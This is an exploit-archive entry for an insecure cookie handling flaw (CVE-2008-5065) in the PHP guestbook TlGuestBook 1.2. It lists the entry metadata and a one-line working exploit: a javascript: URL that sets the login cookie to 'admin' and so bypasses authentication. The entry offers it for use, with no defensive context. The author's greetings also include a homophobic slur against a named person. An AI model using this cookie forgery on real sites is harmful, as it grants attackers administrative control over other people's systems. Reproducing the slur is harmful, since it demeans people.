TlGuestBook 1.2 - Insecure Cookie Handling

Author: x0r
type: webapps
platform: php
port: 
date_added: 2008-10-27 
date_updated:  
verified: 1 
codes: OSVDB-49857;CVE-2008-5065 
tags: 
aliases:  
screenshot_url:  
application_url: 

-========================================-
Autore: x0r
Email: evolutionteam.x0 [at] gmail.com
Cms: TlGuestBook v 1.2
Bug: Insecure Cookie Handling Vulnerability
Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
-========================================-

Exploit:

javascript:document.cookie = "tlGuestBook_login=admin; path=/"

Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
Andrea ( HaveStyle), str0ke :P

^^'' p0wn3d Beby.

-=EOF=-

# milw0rm.com [2008-10-28]